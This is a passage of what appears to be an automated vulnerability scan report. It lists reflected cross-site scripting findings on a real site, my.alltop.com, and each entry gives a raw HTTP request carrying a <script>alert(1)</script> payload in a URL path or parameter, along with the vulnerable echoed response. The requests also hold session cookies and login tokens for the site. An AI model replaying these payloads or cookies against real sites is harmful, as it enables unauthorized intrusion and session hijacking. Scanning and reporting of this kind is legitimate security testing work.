The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ab05"><script>alert(1)</script>cc3e70f6981 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p8ab05"><script>alert(1)</script>cc3e70f6981/%2522ns%253D%2522netsparker%25280x000204%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:13 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:13 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p8ab05"><script>alert(1)</script>cc3e70f6981/%2522ns%253D%2522netsparker%25280x000204%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.199. http://my.alltop.com/alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload befa5"><script>alert(1)</script>c6fcddd9845 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529)befa5"><script>alert(1)</script>c6fcddd9845 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:15 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:15 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529)befa5"><script>alert(1)</script>c6fcddd9845" method="post" accept-charset="utf-8">
...[SNIP]...

1.200. http://my.alltop.com/alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 220d0"><script>alert(1)</script>1a1cd672f6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529)?220d0"><script>alert(1)</script>1a1cd672f6a=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:12 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:13 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:13 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p/%2522ns%253D%2522netsparker%25280x000204%2529)?220d0"><script>alert(1)</script>1a1cd672f6a=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.201. http://my.alltop.com/alpha/q [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/q

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3fbf"><script>alert(1)</script>13c7c27296e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/qb3fbf"><script>alert(1)</script>13c7c27296e HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/qb3fbf"><script>alert(1)</script>13c7c27296e" method="post" accept-charset="utf-8">
...[SNIP]...

1.202. http://my.alltop.com/alpha/q [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/q

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a05e"><script>alert(1)</script>665b69d2b17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/q?4a05e"><script>alert(1)</script>665b69d2b17=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:51 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:51 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/q?4a05e"><script>alert(1)</script>665b69d2b17=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.203. http://my.alltop.com/alpha/r [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/r

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae528"><script>alert(1)</script>546c08a0223 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/rae528"><script>alert(1)</script>546c08a0223 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:52 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:54 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:54 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/rae528"><script>alert(1)</script>546c08a0223" method="post" accept-charset="utf-8">
...[SNIP]...

1.204. http://my.alltop.com/alpha/r [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/r

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d304"><script>alert(1)</script>d9fb1424a9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/r?4d304"><script>alert(1)</script>d9fb1424a9a=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:52 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/r?4d304"><script>alert(1)</script>d9fb1424a9a=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.205. http://my.alltop.com/alpha/s [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/s

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 352f7"><script>alert(1)</script>51c307c634d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/s352f7"><script>alert(1)</script>51c307c634d HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:56 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:57 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/s352f7"><script>alert(1)</script>51c307c634d" method="post" accept-charset="utf-8">
...[SNIP]...

1.206. http://my.alltop.com/alpha/s [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/s

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24241"><script>alert(1)</script>ad68c4627bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/s?24241"><script>alert(1)</script>ad68c4627bb=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/s?24241"><script>alert(1)</script>ad68c4627bb=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.207. http://my.alltop.com/alpha/t ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t

Issue detail

The value of the '"--></style></script><script>netsparker(0x000222)</script> request parameter is copied into the HTML document as plain text between tags. The payload de688<script>alert(1)</script>8612f734538 was submitted in the '"--></style></script><script>netsparker(0x000222)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t?'"--></style></script><script>netsparker(0x000222)</script>de688<script>alert(1)</script>8612f734538 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:23 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>de688<script>alert(1)</script>8612f734538" method="post" accept-charset="utf-8">
...[SNIP]...

1.208. http://my.alltop.com/alpha/t [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58df7"><script>alert(1)</script>67253344f17 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t58df7"><script>alert(1)</script>67253344f17 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:15 GMT
Server: Apache/2.2.3 (Red Hat)
